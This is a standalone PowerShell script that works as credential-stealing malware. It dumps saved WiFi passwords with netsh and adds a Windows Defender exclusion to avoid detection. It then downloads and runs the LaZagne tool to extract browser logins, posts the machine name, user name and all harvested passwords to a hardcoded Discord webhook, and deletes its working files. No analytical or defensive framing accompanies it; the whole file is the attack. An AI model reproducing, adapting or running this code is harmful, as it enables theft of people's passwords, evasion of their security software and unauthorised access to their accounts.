# Discord Webhook
$webhook = "https://discord.com/api/webhooks/1467247480428171385/TSirVX8AGKGeYAOImDkrGzyQGQjgGRMq6_E-zkv8UTIzu5jBzFGIC4ug15xtQSTys27R"

# Get PC info
$pc = "$env:COMPUTERNAME | $env:USERNAME"

# === WiFi Passwords ===
$wifi = ""
$profiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | ForEach-Object { $_.Matches.Groups[1].Value.Trim() }
foreach($name in $profiles) {
    $passLine = (netsh wlan show profile name="$name" key=clear) | Select-String "Key Content\W+\:(.+)$"
    if($passLine) {
        $wifi += "$name : $($passLine.Matches.Groups[1].Value.Trim())`n"
    }
}
if(-not $wifi) { $wifi = "No WiFi networks found" }

# === Browser Passwords ===
$tempDir = "$env:TEMP\$(Get-Random)"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
Add-MpPreference -ExclusionPath $tempDir -ErrorAction SilentlyContinue

try {
    # Download LaZagne
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    Invoke-WebRequest -Uri "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -OutFile "$tempDir\lz.exe" -UseBasicParsing
    
    # Run LaZagne
    $result = & "$tempDir\lz.exe" browsers 2>&1 | Out-String
    
    # Parse passwords
    $browsers = ""
    $lines = $result -split "`n"
    $url = $user = ""
    
    foreach($line in $lines) {
        if($line -match "URL: (.+)") { $url = $matches[1].Trim() }
        elseif($line -match "Login: (.+)") { $user = $matches[1].Trim() }
        elseif($line -match "Password: (.+)") {
            $pass = $matches[1].Trim()
            if($pass -notmatch "^b'") {
                $browsers += "$url`nUser: $user`nPass: $pass`n`n"
            }
        }
    }
    
    if(-not $browsers) { $browsers = "No passwords found (Windows 11 not supported)" }
} catch {
    $browsers = "Error: $($_.Exception.Message)"
}

# Cleanup
Remove-MpPreference -ExclusionPath $tempDir -ErrorAction SilentlyContinue
Remove-Item -Path $tempDir -Recurse -Force -ErrorAction SilentlyContinue

# Send to Discord
$output = "**PC: $pc**`n`n**WiFi:**`n$wifi`n**Browsers:**`n$browsers"

if($output.Length -gt 1900) {
    for($i = 0; $i -lt $output.Length; $i += 1900) {
        $chunk = $output.Substring($i, [Math]::Min(1900, $output.Length - $i))
        Invoke-RestMethod -Uri $webhook -Method Post -Body (@{content=$chunk} | ConvertTo-Json) -ContentType 'application/json'
        Start-Sleep -Milliseconds 500
    }
} else {
    Invoke-RestMethod -Uri $webhook -Method Post -Body (@{content=$output} | ConvertTo-Json) -ContentType 'application/json'
}
